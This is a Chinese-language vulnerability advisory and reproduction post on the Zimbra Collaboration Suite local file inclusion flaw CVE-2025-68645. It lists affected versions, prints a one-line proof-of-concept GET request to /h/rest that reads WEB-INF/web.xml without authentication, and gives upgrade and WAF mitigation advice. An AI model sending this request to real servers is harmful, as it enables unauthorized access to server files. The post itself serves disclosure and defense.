文章总结： ZimbraCollaborationSuite存在CVE-2025-68645本地文件包含漏洞，影响10.0.18及10.1.13以下版本。未经认证攻击者可通过h/rest接口利用javax.servlet.include.servlet_path参数读取WEB-INF/web.xml等敏感文件。建议立即升级至最新版本或通过WAF限制接口访问以修复风险。 综合评分： 83 文章分类： 漏洞预警,漏洞分析,漏洞POC,WEB安全,解决方案

【漏洞复现】Zimbra本地文件包含漏洞(CVE-2025-68645)

DeareX

破浪信安

2025年12月31日 17:21 四川

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞简介

Zimbra Collaboration Suite 是一款功能强大的企业级开源电子邮件与协同办公平台，由美国Zimbra公司开发。它的核心功能不仅限于电子邮件服务，还集成了日历、联系人管理、文档编辑与共享、即时消息以及任务管理等高级协作工具。

CVE-2025-68645是Zimbra Collaboration Suite中存在的一个本地文件包含漏洞，未经身份验证的攻击者可以利用它读取服务器上的敏感文件。

影响版本

Zimbra Collaboration Suite 10.0 < 10.0.18

Zimbra Collaboration Suite 10.1 < 10.1.13

漏洞复现

poc:

GET /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

影响及修复建议

影响

该漏洞源于 Zimbra 的 Webmail Classic UI 中的一个组件——RestFilter Servlet，它在处理用户可控的请求参数时存在缺陷 。攻击者可以构造一个特殊的请求路径，通过 javax.servlet.include.servlet_path参数影响服务器内部请求分发的逻辑，从而绕过正常的访问控制 。

攻击路径：

攻击者无需任何身份验证，即可向 /h/rest端点发送恶意请求 。

利用效果：

成功利用后，攻击者能够读取 Zimbra 应用 WebRoot 目录下的任意文件，例如核心配置文件 WEB-INF/web.xml、其他包含敏感信息的资源。但其他配置文件均不在这个路径下，实战中能造成一定影响的配置文件就只有web.xml文件。

修复建议

面对此漏洞，最有效的措施是立即升级系统。

官方补丁升级：

Zimbra官方已发布修复版本，请根据您当前使用的版本，升级至对应的安全版本：Zimbra Collaboration Suite 10.0.18 或 10.1.13 及以上版本。

临时缓解措施：

如果无法立即升级，可以考虑以下方案来降低风险：

网络限制：通过防火墙或Web应用防火墙（WAF）规则，严格限制对 /h/rest接口的访问，仅允许可信的IP地址。

加强监控：密切监控Web服务器日志，检查是否存在大量访问 /h/rest端点并包含可疑路径参数的请求。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：破浪信安 DeareX《【漏洞复现】Zimbra本地文件包含漏洞(CVE-2025-68645)》